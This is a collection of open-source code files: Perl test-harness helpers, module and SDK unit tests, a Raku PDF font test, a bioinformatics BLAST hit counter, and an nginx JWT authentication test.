if ($reason{$what} && $reason{$what} =~ s/^\?//) {
my $temp = eval $reason{$what};
if ($@) {
die "# In \U$what\E code reason:\n# $reason{$what}\n$@";
}
$reason{$what} = $temp;
}
}
my $name = '';
if ($prog =~ s/^#\s*NAME\s+(.+)\n//m) {
$name = $1;
}
if ($reason{skip}) {
SKIP:
{
skip($name ? "$name - $reason{skip}" : $reason{skip}, 1);
}
next PROGRAM;
}
if ($prog =~ /--FILE--/) {
my @files = split(/\n?--FILE--\s*([^\s\n]*)\s*\n/, $prog) ;
shift @files ;
die "Internal error: test $_ didn't split into pairs, got " .
scalar(@files) . "[" . join("%%%%", @files) ."]\n"
if @files % 2;
while (@files > 2) {
my $filename = shift @files;
my $code = shift @files;
push @temps, $filename;
if ($filename =~ m#(.*)/# && $filename !~ m#^\.\./#) {
require File::Path;
File::Path::mkpath($1);
push(@temp_path, $1);
}
open my $fh, '>', $filename or die "Cannot open $filename: $!\n";
print $fh $code;
close $fh or die "Cannot close $filename: $!\n";
}
shift @files;
$prog = shift @files;
}
open my $fh, '>', $tmpfile or die "Cannot open >$tmpfile: $!";
print $fh q{
BEGIN {
open STDERR, '>&', STDOUT
or die "Can't dup STDOUT->STDERR: $!;";
}
};
print $fh "\n#line 1\n"; # So the line numbers don't get messed up.
print $fh $prog,"\n";
close $fh or die "Cannot close $tmpfile: $!";
my $results = runperl( stderr => 1, progfile => $tmpfile,
stdin => undef, $up
? (switches => [ "-I.", "-I$up/lib", $switch], nolib => 1)
: (switches => [ "-I.", $switch])
);
my $status = $?;
$results =~ s/\n+$//;
# allow expected output to be written as if $prog is on STDIN
$results =~ s/$::tempfile_regexp/-/g;
if ($^O eq 'VMS') {
# some tests will trigger VMS messages that won't be expected
$results =~ s/\n?%[A-Z]+-[SIWEF]-[A-Z]+,.*//;
# pipes double these sometimes
$results =~ s/\n\n/\n/g;
}
# bison says 'parse error' instead of 'syntax error',
# various yaccs may or may not capitalize 'syntax'.
$results =~ s/^(syntax|parse) error/syntax error/mig;
# allow all tests to run when there are leaks
$results =~ s/Scalars leaked: \d+\n//g;
$expected =~ s/\n+$//;
my $prefix = ($results =~ s#^PREFIX(\n|$)##) ;
# any special options? (OPTIONS foo bar zap)
my $option_regex = 0;
my $option_random = 0;
my $fatal = $FATAL;
if ($expected =~ s/^OPTIONS? (.+)\n//) {
foreach my $option (split(' ', $1)) {
if ($option eq 'regex') { # allow regular expressions
$option_regex = 1;
}
elsif ($option eq 'random') { # all lines match, but in any order
$option_random = 1;
}
elsif ($option eq 'fatal') { # perl should fail
$fatal = 1;
}
else {
die "$0: Unknown OPTION '$option'\n";
}
}
}
die "$0: can't have OPTION regex and random\n"
if $option_regex + $option_random > 1;
my $ok = 0;
if ($results =~ s/^SKIPPED\n//) {
print "$results\n" ;
$ok = 1;
}
else {
if ($option_random) {
my @got = sort split "\n", $results;
my @expected = sort split "\n", $expected;
$ok = "@got" eq "@expected";
}
elsif ($option_regex) {
$ok = $results =~ /^$expected/;
}
elsif ($prefix) {
$ok = $results =~ /^\Q$expected/;
}
else {
$ok = $results eq $expected;
}
if ($ok && $fatal && !($status >> 8)) {
$ok = 0;
}
}
local $::TODO = $reason{todo};
unless ($ok) {
my $err_line = "PROG: $switch\n$prog\n" .
"EXPECTED:\n$expected\n";
$err_line .= "EXIT STATUS: != 0\n" if $fatal;
$err_line .= "GOT:\n$results\n";
$err_line .= "EXIT STATUS: " . ($status >> 8) . "\n" if $fatal;
if ($::TODO) {
$err_line =~ s/^/# /mg;
print $err_line; # Harness can't filter it out from STDERR.
}
else {
print STDERR $err_line;
}
}
if (defined $file) {
_ok($ok, "at $file line $line", $name);
} else {
# We don't have file and line number data for the test, so report
# errors as coming from our caller.
local $Level = $Level + 1;
ok($ok, $name);
}
foreach (@temps) {
unlink $_ if $_;
}
foreach (@temp_path) {
File::Path::rmtree $_ if -d $_;
}
}
}
sub can_ok ($@) {
my($proto, @methods) = @_;
my $class = ref $proto || $proto;
unless( @methods ) {
return _ok( 0, _where(), "$class->can(...)" );
}
my @nok = ();
foreach my $method (@methods) {
local($!, $@); # don't interfere with caller's $@
# eval sometimes resets $!
eval { $proto->can($method) } || push @nok, $method;
}
my $name;
$name = @methods == 1 ? "$class->can('$methods[0]')"
: "$class->can(...)";
_ok( !@nok, _where(), $name );
}
# Call $class->new( @$args ); and run the result through object_ok.
# See Test::More::new_ok
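# Example usage (class name and arguments are hypothetical):
#   my $obj = new_ok('Some::Class', [ 'arg1', 'arg2' ], 'Some::Class object');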
sub new_ok {
my($class, $args, $obj_name) = @_;
$args ||= [];
    $obj_name = "The object" unless defined $obj_name;
    local $Level = $Level + 1;
    my $obj;
    my $ok = eval { $obj = $class->new(@$args); 1 };
    my $error = $@;
    if($ok) {
        object_ok($obj, $class, $obj_name);
    }
    else {
        ok( 0, "new() died" );
        diag("Error was: $error");
}
return $obj;
}
sub isa_ok ($$;$) {
my($object, $class, $obj_name) = @_;
my $diag;
$obj_name = 'The object' unless defined $obj_name;
my $name = "$obj_name isa $class";
if( !defined $object ) {
$diag = "$obj_name isn't defined";
}
else {
my $whatami = ref $object ? 'object' : 'class';
# We can't use UNIVERSAL::isa because we want to honor isa() overrides
local($@, $!); # eval sometimes resets $!
my $rslt = eval { $object->isa($class) };
my $error = $@; # in case something else blows away $@
if( $error ) {
if( $error =~ /^Can't call method "isa" on unblessed reference/ ) {
# It's an unblessed reference
$obj_name = 'The reference' unless defined $obj_name;
if( !UNIVERSAL::isa($object, $class) ) {
my $ref = ref $object;
$diag = "$obj_name isn't a '$class' it's a '$ref'";
}
}
elsif( $error =~ /Can't call method "isa" without a package/ ) {
# It's something that can't even be a class
$obj_name = 'The thing' unless defined $obj_name;
$diag = "$obj_name isn't a class or reference";
}
else {
die <<WHOA;
WHOA! I tried to call ->isa on your object and got some weird error.
This should never happen. Please contact the author immediately.
Here's the error.
$@
WHOA
}
}
elsif( !$rslt ) {
$obj_name = "The $whatami" unless defined $obj_name;
my $ref = ref $object;
$diag = "$obj_name isn't a '$class' it's a '$ref'";
}
}
_ok( !$diag, _where(), $name );
}
sub class_ok {
my($class, $isa, $class_name) = @_;
# Written so as to count as one test
local $Level = $Level + 1;
if( ref $class ) {
ok( 0, "$class is a reference, not a class name" );
}
else {
isa_ok($class, $isa, $class_name);
}
}
sub object_ok {
my($obj, $isa, $obj_name) = @_;
local $Level = $Level + 1;
if( !ref $obj ) {
ok( 0, "$obj is not a reference" );
}
else {
isa_ok($obj, $isa, $obj_name);
}
}
# Purposefully avoiding a closure.
sub __capture {
push @::__capture, join "", @_;
}
sub capture_warnings {
my $code = shift;
local @::__capture;
local $SIG {__WARN__} = \&__capture;
&$code;
return @::__capture;
}
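# Example usage (illustrative):
#   my @w = capture_warnings(sub { warn "careful\n" });
#   # @w now holds the single string "careful\n"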
# This will generate a variable number of tests.
# Use done_testing() instead of a fixed plan.
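# Example usage (illustrative; expected entries may be exact strings or regexps):
#   warnings_like(sub { warn "a\n"; warn "b\n" },
#                 [ "a\n", qr/b/ ],
#                 'both warnings seen');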
sub warnings_like {
my ($code, $expect, $name) = @_;
local $Level = $Level + 1;
my @w = capture_warnings($code);
cmp_ok(scalar @w, '==', scalar @$expect, $name);
foreach my $e (@$expect) {
if (ref $e) {
like(shift @w, $e, $name);
} else {
is(shift @w, $e, $name);
}
}
if (@w) {
diag("Saw these additional warnings:");
diag($_) foreach @w;
}
}
sub _fail_excess_warnings {
my($expect, $got, $name) = @_;
local $Level = $Level + 1;
# This will fail, and produce diagnostics
is($expect, scalar @$got, $name);
diag("Saw these warnings:");
diag($_) foreach @$got;
}
sub warning_is {
my ($code, $expect, $name) = @_;
die sprintf "Expect must be a string or undef, not a %s reference", ref $expect
if ref $expect;
local $Level = $Level + 1;
my @w = capture_warnings($code);
if (@w > 1) {
_fail_excess_warnings(0 + defined $expect, \@w, $name);
} else {
is($w[0], $expect, $name);
}
}
sub warning_like {
my ($code, $expect, $name) = @_;
die sprintf "Expect must be a regexp object"
unless ref $expect eq 'Regexp';
local $Level = $Level + 1;
my @w = capture_warnings($code);
if (@w > 1) {
_fail_excess_warnings(0 + defined $expect, \@w, $name);
} else {
like($w[0], $expect, $name);
}
}
# Set a watchdog to timeout the entire test file
# NOTE: If the test file uses 'threads', then call the watchdog() function
# _AFTER_ the 'threads' module is loaded.
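# Example usage (illustrative): give the whole test file five minutes, letting
# watchdog() choose between a watchdog process, thread, or alarm() for itself:
#   watchdog(5 * 60);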
sub watchdog ($;$)
{
my $timeout = shift;
my $method = shift || "";
my $timeout_msg = 'Test process timed out - terminating';
# Valgrind slows perl way down so give it more time before dying.
$timeout *= 10 if $ENV{PERL_VALGRIND};
my $pid_to_kill = $$; # PID for this process
if ($method eq "alarm") {
goto WATCHDOG_VIA_ALARM;
}
# shut up use only once warning
my $threads_on = $threads::threads && $threads::threads;
# Don't use a watchdog process if 'threads' is loaded -
# use a watchdog thread instead
if (!$threads_on || $method eq "process") {
# On Windows and VMS, try launching a watchdog process
# using system(1, ...) (see perlport.pod)
if ($is_mswin || $is_vms) {
# On Windows, try to get the 'real' PID
if ($is_mswin) {
eval { require Win32; };
if (defined(&Win32::GetCurrentProcessId)) {
$pid_to_kill = Win32::GetCurrentProcessId();
}
}
# If we still have a fake PID, we can't use this method at all
return if ($pid_to_kill <= 0);
# Launch watchdog process
my $watchdog;
eval {
local $SIG{'__WARN__'} = sub {
_diag("Watchdog warning: $_[0]");
};
my $sig = $is_vms ? 'TERM' : 'KILL';
my $prog = "sleep($timeout);" .
"warn qq/# $timeout_msg" . '\n/;' .
"kill(q/$sig/, $pid_to_kill);";
# On Windows use the indirect object plus LIST form to guarantee
# that perl is launched directly rather than via the shell (see
# perlfunc.pod), and ensure that the LIST has multiple elements
# since the indirect object plus COMMANDSTRING form seems to
# hang (see perl #121283). Don't do this on VMS, which doesn't
# support the LIST form at all.
if ($is_mswin) {
my $runperl = which_perl();
if ($runperl =~ m/\s/) {
$runperl = qq{"$runperl"};
}
$watchdog = system({ $runperl } 1, $runperl, '-e', $prog);
}
else {
my $cmd = _create_runperl(prog => $prog);
$watchdog = system(1, $cmd);
}
};
if ($@ || ($watchdog <= 0)) {
_diag('Failed to start watchdog');
_diag($@) if $@;
undef($watchdog);
return;
}
# Add END block to parent to terminate and
# clean up watchdog process
eval("END { local \$! = 0; local \$? = 0;
wait() if kill('KILL', $watchdog); };");
return;
}
# Try using fork() to generate a watchdog process
my $watchdog;
eval { $watchdog = fork() };
if (defined($watchdog)) {
if ($watchdog) { # Parent process
# Add END block to parent to terminate and
# clean up watchdog process
eval "END { local \$! = 0; local \$? = 0;
wait() if kill('KILL', $watchdog); };";
return;
}
### Watchdog process code
# Load POSIX if available
eval { require POSIX; };
# Execute the timeout
sleep($timeout - 2) if ($timeout > 2); # Workaround for perlbug #49073
sleep(2);
# Kill test process if still running
if (kill(0, $pid_to_kill)) {
_diag($timeout_msg);
kill('KILL', $pid_to_kill);
if ($is_cygwin) {
# sometimes the above isn't enough on cygwin
sleep 1; # wait a little, it might have worked after all
system("/bin/kill -f $pid_to_kill");
}
}
# Don't execute END block (added at beginning of this file)
$NO_ENDING = 1;
# Terminate ourself (i.e., the watchdog)
POSIX::_exit(1) if (defined(&POSIX::_exit));
exit(1);
}
# fork() failed - fall through and try using a thread
}
# Use a watchdog thread because either 'threads' is loaded,
# or fork() failed
if (eval {require threads; 1}) {
'threads'->create(sub {
# Load POSIX if available
eval { require POSIX; };
# Execute the timeout
my $time_left = $timeout;
do {
$time_left = $time_left - sleep($time_left);
} while ($time_left > 0);
# Kill the parent (and ourself)
select(STDERR); $| = 1;
_diag($timeout_msg);
POSIX::_exit(1) if (defined(&POSIX::_exit));
my $sig = $is_vms ? 'TERM' : 'KILL';
kill($sig, $pid_to_kill);
})->detach();
return;
}
# If everything above fails, then just use an alarm timeout
WATCHDOG_VIA_ALARM:
if (eval { alarm($timeout); 1; }) {
# Load POSIX if available
eval { require POSIX; };
# Alarm handler will do the actual 'killing'
$SIG{'ALRM'} = sub {
select(STDERR); $| = 1;
_diag($timeout_msg);
POSIX::_exit(1) if (defined(&POSIX::_exit));
my $sig = $is_vms ? 'TERM' : 'KILL';
kill($sig, $pid_to_kill);
};
}
}
1;
==== File: perl/src/ext/Devel-PPPort/t/limits.t (repo nokibsarkar/sl4a, license Apache-2.0) ====
################################################################################
#
# !!!!! Do NOT edit this file directly! !!!!!
#
# Edit mktests.PL and/or parts/inc/limits instead.
#
# This file was automatically generated from the definition files in the
# parts/inc/ subdirectory by mktests.PL. To learn more about how all this
# works, please read the F<HACKERS> file that came with this distribution.
#
################################################################################
BEGIN {
if ($ENV{'PERL_CORE'}) {
chdir 't' if -d 't';
@INC = ('../lib', '../ext/Devel-PPPort/t') if -d '../lib' && -d '../ext';
require Config; import Config;
use vars '%Config';
if (" $Config{'extensions'} " !~ m[ Devel/PPPort ]) {
print "1..0 # Skip -- Perl configured without Devel::PPPort module\n";
exit 0;
}
}
else {
unshift @INC, 't';
}
sub load {
eval "use Test";
require 'testutil.pl' if $@;
}
if (4) {
load();
plan(tests => 4);
}
}
use Devel::PPPort;
use strict;
$^W = 1;
package Devel::PPPort;
use vars '@ISA';
require DynaLoader;
@ISA = qw(DynaLoader);
bootstrap Devel::PPPort;
package main;
ok(&Devel::PPPort::iv_size());
ok(&Devel::PPPort::uv_size());
ok(&Devel::PPPort::iv_type());
ok(&Devel::PPPort::uv_type());
==== File: t/EzsigntemplateformfieldgroupsignerResponseTest.t (repo ezmaxinc/eZmax-SDK-perl, license MIT) ====
=begin comment
eZmax API Definition (Full)
This API exposes all the functionalities of the eZmax and eZsign applications.
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by the OpenAPI Generator
# Please update the test cases below to test the model.
# Ref: https://openapi-generator.tech
#
use Test::More tests => 2;
use Test::Exception;
use lib 'lib';
use strict;
use warnings;
use_ok('EzmaxApi::Object::EzsigntemplateformfieldgroupsignerResponse');
# uncomment below and update the test
#my $instance = EzmaxApi::Object::EzsigntemplateformfieldgroupsignerResponse->new();
#
#isa_ok($instance, 'EzmaxApi::Object::EzsigntemplateformfieldgroupsignerResponse');
==== File: t/core-font.t (repo p6-pdf/perl6-PDF-Graphics, license Artistic-2.0, Raku source) ====
use v6;
use Test;
plan 54;
use lib 't/lib';
use PDF::Grammar::Test :is-json-equiv;
use PDF::Content::Font;
use PDF::Content::Font::CoreFont;
use PDFTiny;
is PDF::Content::Font::CoreFont.core-font-name('Helvetica,Bold'), 'helvetica-bold', 'core-font-name';
is PDF::Content::Font::CoreFont.core-font-name('Helvetica-BoldOblique'), 'helvetica-boldoblique', 'core-font-name';
is PDF::Content::Font::CoreFont.core-font-name('Arial,Bold'), 'helvetica-bold', 'core-font-name';
is-deeply PDF::Content::Font::CoreFont.core-font-name('Blah'), Nil, 'core-font-name';
my PDF::Content::Font::CoreFont $tr-bold .= load-font( :family<Times-Roman>, :weight<bold>);
is $tr-bold.font-name, 'Times-Bold', 'font-name';
my PDF::Content::Font::CoreFont $tsym .= load-font( :family<Symbol>, :weight<bold>);
is $tsym.font-name, 'Symbol', 'font-name';
is $tsym.enc, 'sym', 'enc';
my PDF::Content::Font::CoreFont $hb-afm .= load-font( 'Helvetica-Bold' );
isa-ok $hb-afm.metrics, 'Font::AFM';
is $hb-afm.font-name, 'Helvetica-Bold', 'font-name';
is $hb-afm.enc, 'win', '.enc';
is $hb-afm.height, 1190, 'font height';
is $hb-afm.height(:hanging), 925, 'font height hanging';
is-approx $hb-afm.height(12), 14.28, 'font height @ 12pt';
is-approx $hb-afm.height(12, :from-baseline), 11.544, 'font base-height @ 12pt';
is-approx $hb-afm.height(12, :hanging), 11.1, 'font hanging height @ 12pt';
is $hb-afm.encode("A♥♣✔B"), "A\x[1]\x[2]B", '.encode(...) sanity';
# - 'A' & 'B' are in the encoding scheme and font
# - '♥', '♣' are in the font, but not the encoding scheme
# - '✔' is in neither
is-deeply $hb-afm.encoder.charset, (my UInt %{UInt} = 'A'.ord => 'A'.ord, 'B'.ord => 'B'.ord, '♥'.ord => 1, '♣'.ord => 2), 'charset';
is-json-equiv $hb-afm.encoder.differences, (1, "heart", "club"), 'differences';
my PDF::Content::Font::CoreFont $ab-afm .= load-font( 'Arial-Bold' );
isa-ok $ab-afm.metrics, 'Font::AFM';
is $ab-afm.font-name, 'Helvetica-Bold', 'font-name';
is $ab-afm.encode("A♥♣✔B"), "A\x[1]\x[2]B", '.encode(...) sanity';
my PDF::Content::Font::CoreFont $hbi-afm .= load-font( :family<Helvetica>, :weight<Bold>, :style<Italic> );
is $hbi-afm.font-name, 'Helvetica-BoldOblique', ':font-family => font-name';
my PDF::Content::Font::CoreFont $hb-afm-again .= load-font( 'Helvetica-Bold' );
ok $hb-afm-again === $hb-afm, 'font caching';
my $ext-chars = "ΨΩαΩ";
my $enc = $hbi-afm.encode($ext-chars);
is $enc, "\x[1]\x[2]\x[3]\x[2]", "extended chars encoding";
is $hbi-afm.decode($enc), $ext-chars, "extended chars decoding";
$hbi-afm.cb-finish;
my $hbi-afm-dict = $hbi-afm.to-dict;
is-json-equiv $hbi-afm-dict, {
:Type<Font>,
:Subtype<Type1>,
:BaseFont<Helvetica-BoldOblique>,
:Encoding{
:Type<Encoding>,
:BaseEncoding<WinAnsiEncoding>,
:Differences[1, "Psi", "Omega", "alpha"],
},
}, "to-dict (extended chars)";
my PDF::Content::Font::CoreFont $tr-afm .= load-font( 'Times-Roman' );
is $tr-afm.stringwidth("RVX", :!kern), 2111, 'stringwidth :!kern';
is $tr-afm.stringwidth("RVX", :kern), 2111 - 80, 'stringwidth :kern';
is-deeply $tr-afm.kern("RVX" ), (['R', -80, 'VX'], 2031), '.kern(...)';
for (win => "Á®ÆØ",
mac => "種¯") {
my ($enc, $encoded) = .kv;
my $fnt = PDF::Content::Font::CoreFont.load-font( 'helvetica', :$enc );
my $decoded = "Á®ÆØ";
my $re-encoded = $fnt.encode($decoded);
is-deeply $re-encoded, $encoded, "$enc encoding";
is-deeply $fnt.decode($encoded), $decoded, "$enc decoding";
is-deeply $fnt.decode($encoded, :ords), $decoded.ords, "$enc raw decoding";
}
my PDF::Content::Font::CoreFont $zapf .= load-font( 'ZapfDingbats' );
isa-ok $zapf.metrics, 'Font::Metrics::zapfdingbats';
is $zapf.enc, 'zapf', '.enc';
is $zapf.encode("♥♣✔"), "ª¨4", '.encode(...)'; # /a110 /a112 /a20
is $zapf.decode("ª¨4"), "♥♣✔", '.decode(...)';
is $zapf.decode("\o251\o252"), "♦♥", '.decode(...)';
isa-ok PDF::Content::Font::CoreFont.load-font('CourierNew,Bold').metrics, 'Font::Metrics::courier-bold';
my PDF::Content::Font::CoreFont $sym .= load-font( 'Symbol' );
isa-ok $sym.metrics, 'Font::Metrics::symbol';
is $sym.enc, 'sym', '.enc';
is $sym.encode("ΑΒΓ"), "ABG", '.encode(...)'; # /Alpha /Beta /Gamma
is $sym.decode("ABG"), "ΑΒΓ", '.decode(...)';
use Font::AFM;
use PDF::Content::Font::Enc::Type1;
my $metrics = Font::AFM.core-font('times-roman');
my @differences = [1, 'x', 'y', 10, 'a', 'b'];
my PDF::Content::Font::Enc::Type1 $encoder .= new: :enc<win>;
$encoder.differences = @differences;
my PDF::Content::Font::CoreFont $tr .= new: :$metrics, :$encoder;
is-deeply $tr.encode('abcxyz', :cids), buf8.new(10,11,99,1,2,122), 'win differences encoding';
$tr.cb-finish;
is-json-equiv $tr.to-dict<Encoding><Differences>, [1, "x", "y", 10, "a", "b"], 'dfferences to-dict';
$encoder .= new: :enc<mac-extra>;
$encoder.differences = @differences;
$tr .= new: :$metrics, :$encoder;
my $dec = 'abcxyz½';
$enc = buf8.new(10,11,3,1,2,4,72);
is-deeply $tr.encode($dec, :cids), $enc, 'mac-extra differences encoding';
is-deeply $tr.decode($enc.decode), $dec, 'mac-extra differences decoding';
$tr.cb-finish;
is-json-equiv $tr.to-dict<Encoding><Differences>, [1, "x", "y", "c", "z", 10, "a", "b"], 'dfferences to-dict';
my PDFTiny $pdf1 .= new;
my PDFTiny $pdf2 .= new;
my $tr1 = $pdf1.core-font('times-roman');
my $tr2 = $pdf2.core-font('times-roman');
is $tr1.font-name, 'Times-Roman';
ok $tr1 === $pdf1.core-font('times-roman'), 'PDF font caching';
ok $tr1 !=== $tr2, 'font uniqueness 1';
ok $tr1 !=== $pdf2.core-font('times-roman'), 'font uniqueness 2';
done-testing;
==== File: phage_tree/countproteinmatches.pl (repo linsalrob/bioinformatics, license MIT) ====
#!/usr/bin/perl -w
# Copyright 2001, 20002 Rob Edwards
# For updates, more information, or to discuss the scripts
# please contact Rob Edwards at redwards@utmem.edu or via http://www.salmonella.org/
#
# This file is part of The Phage Proteome Scripts developed by Rob Edwards.
#
# Tnese scripts are free software; you can redistribute and/or modify
# them under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# They are distributed in the hope that they will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# in the file (COPYING) along with these scripts; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
#
use DBI;
use strict;
my $dbh=DBI->connect("DBI:mysql:phage", "SQLUSER", "SQLPASSWORD") or die "Can't connect to database\n";
my $dir= shift || &niceexit("countproteinmatches.pl <dir of prot dists>\n");
my @count; my %max;
# read each file one at a time, and add the data to an array
opendir(DIR, $dir) || &niceexit("Can't open $dir");
while (my $file = readdir(DIR)) {
next if ($file =~ /^\./);
open (IN, "$dir/$file") || &niceexit("Can't open $dir/$file\n");
my $get;
while (my $line = <IN>) {
if ($line =~ /Sequences producing/) {$get = 1; next}
next unless ($get);
last if ($line =~ /^>/);
next unless ($line =~ /\d_\d/);
my @a = split (/\s+/, $line);
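  # Hit identifiers are expected to look like "<gene>_<source>"; count the
  # BLAST hits seen for each (source, gene) pair.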
  my ($gene, $source) = split(/_/, $a[0]);
unless ($gene && $source) {die "problem parsing $line\n"}
$count[$source][$gene]++;
unless ($max{$source}) {$max{$source}=$count[$source][$gene]}
if ($count[$source][$gene] > $max{$source}) {$max{$source}=$count[$source][$gene]}
}
close IN;
}
closedir(DIR);
foreach my $source (0 .. $#count) {
foreach my $gene (0 .. $#{$count[$source]}) {
if ($count[$source][$gene]) {
if ($count[$source][$gene] > 1) {print "$source\t$gene\t",$count[$source][$gene] - 1,"\n"}}
}
}
&niceexit();
#my $exc = $dbh->prepare("SELECT translation from protein where count = $gene" ) or croak $dbh->errstr;
# $exc->execute or die $dbh->errstr;
# while (my @retrieved = $exc->fetchrow_array) {print OUT ">$a[0]\n$retrieved[0]\n"}
sub niceexit {
my $reason = shift;
$dbh->disconnect;
if ($reason) {print STDERR $reason; exit(-1)}
else {exit(0)}
}
==== File: src/nginx/t/auth_symmetrickey.t (repo TAOXUY/esp, license BSD-2-Clause) ====
# Copyright (C) Extensible Service Proxy Authors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
################################################################################
#
use strict;
use warnings;
################################################################################
use src::nginx::t::ApiManager; # Must be first (sets up import path to the Nginx test module)
use src::nginx::t::HttpServer;
use src::nginx::t::Auth;
use Test::Nginx; # Imports Nginx's test module
use Test::More; # And the test framework
################################################################################
# Port assignments
my $NginxPort = ApiManager::pick_port();
my $BackendPort = ApiManager::pick_port();
my $ServiceControlPort = ApiManager::pick_port();
my $PubkeyPort = ApiManager::pick_port();
my $t = Test::Nginx->new()->has(qw/http proxy/)->plan(48);
my $config = ApiManager::get_bookstore_service_config;
$config .= <<"EOF";
authentication {
providers {
id: "test_auth"
issuer: "test-esp-auth.com"
jwks_uri: "http://127.0.0.1:${PubkeyPort}/key"
}
rules {
selector: "ListShelves"
requirements {
provider_id: "test_auth"
audiences: "ok_audience_1,ok_audience_2"
}
}
}
control {
environment: "http://127.0.0.1:${ServiceControlPort}"
}
EOF
$t->write_file('service.pb.txt', $config);
ApiManager::write_file_expand($t, 'nginx.conf', <<"EOF");
%%TEST_GLOBALS%%
daemon off;
events {
worker_connections 32;
}
http {
%%TEST_GLOBALS_HTTP%%
server_tokens off;
server {
listen 127.0.0.1:${NginxPort};
server_name localhost;
location / {
endpoints {
api service.pb.txt;
%%TEST_CONFIG%%
on;
}
proxy_pass http://127.0.0.1:${BackendPort};
}
}
}
EOF
# From matching-client-secret-symmetric.json
my $key = "abcedfgabcdefg";
$t->run_daemon(\&bookstore, $t, $BackendPort, 'bookstore.log');
$t->run_daemon(\&servicecontrol, $t, $ServiceControlPort, 'servicecontrol.log');
$t->run_daemon(\&key, $t, $PubkeyPort, $key, 'key.log');
is($t->waitforsocket("127.0.0.1:${BackendPort}"), 1, 'Bookstore socket ready.');
is($t->waitforsocket("127.0.0.1:${ServiceControlPort}"), 1, 'Service control socket ready.');
is($t->waitforsocket("127.0.0.1:${PubkeyPort}"), 1, 'Pubkey socket ready.');
$t->run();
################################################################################
# Missing credentials.
my $response = ApiManager::http_get($NginxPort,'/shelves');
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, missing creds.');
like($response, qr/WWW-Authenticate: Bearer/, 'Returned auth challenge.');
like($response, qr/Content-Type: application\/json/i,
'Missing creds returned application/json body.');
like($response, qr/JWT validation failed: Missing or invalid credentials/i,
"Error body contains 'Missing or invalid credentials'.");
# Invalid credentials.
$response = ApiManager::http($NginxPort,<<'EOF');
GET /shelves HTTP/1.0
Host: localhost
Authorization: Bearer invalid.token
EOF
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, invalid token.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'Invalid token returned application/json body.');
like($response, qr/JWT validation failed: Bad JWT format: Invalid JSON in header/i,
"Error body contains 'bad format'.");
# Token generated from different issuer/key.
my $token = Auth::get_auth_token('./src/nginx/t/wrong-client-secret-symmetric.json');
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, no matching client secret.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'No matching client secret returned application/json body.');
# Audience not allowed.
$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json', 'bad_audience');
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
like($response, qr/HTTP\/1\.1 403 Forbidden/, 'Returned HTTP 403, audience not allowed.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'Audience not allowed returned application/json body.');
$t->stop_daemons();
my $no_bookstore_requests = $t->read_file('bookstore.log');
is($no_bookstore_requests, '', 'Request did not reach the backend.');
my $no_key_requests = $t->read_file('key.log');
is($no_key_requests, '', 'No client secret fetch (bad token).');
# Key is unreachable.
$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json', 'ok_audience_1');
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves?key=this-is-an-api-key HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, unable to fetch key.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'Unable to fetch key returned application/json body.');
# Auth OK with allowed audience, key is not cached, token in url parameter.
$t->run_daemon(\&bookstore, $t, $BackendPort, 'bookstore.log');
$t->run_daemon(\&servicecontrol, $t, $ServiceControlPort, 'servicecontrol.log');
$t->run_daemon(\&key, $t, $PubkeyPort, $key, 'key.log');
is($t->waitforsocket("127.0.0.1:${BackendPort}"), 1, 'Bookstore socket ready.');
is($t->waitforsocket("127.0.0.1:${ServiceControlPort}"), 1, 'Service control port ready.');
is($t->waitforsocket("127.0.0.1:${PubkeyPort}"), 1, 'Pubkey socket ready.');
